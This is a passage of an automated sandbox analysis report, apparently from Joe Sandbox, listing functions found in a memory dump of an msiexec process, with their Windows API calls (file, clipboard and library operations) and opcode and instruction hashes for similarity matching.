                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                              Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                              Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                              Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                              Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                              Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                              Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                              Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                              Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                              Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                              Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                              Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                              Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004095FC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3655998216-0
                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                              Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00445426
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                              • String ID:
                                                              • API String ID: 1828521557-0
                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                              Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                              Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                              • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                              Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                              • Opcode Fuzzy Hash: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                              Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: 7fd453b969d00c260b074e87a0c85b013e25bcf615c8c530e1f104565a44bb5d
                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                              • Opcode Fuzzy Hash: 7fd453b969d00c260b074e87a0c85b013e25bcf615c8c530e1f104565a44bb5d
                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                              Non-executed Functions

                                                              Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                              • GetLastError.KERNEL32 ref: 00409974
                                                              • CloseClipboard.USER32 ref: 0040997D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 3604893535-0
                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                              Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                              Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00409882
                                                              • wcslen.MSVCRT ref: 0040988F
                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                              • CloseClipboard.USER32 ref: 004098D7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1213725291-0
                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                              Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • free.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 2360000266-2664311388
                                                              • Opcode ID: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                              • Opcode Fuzzy Hash: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                              Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                              • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                              Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
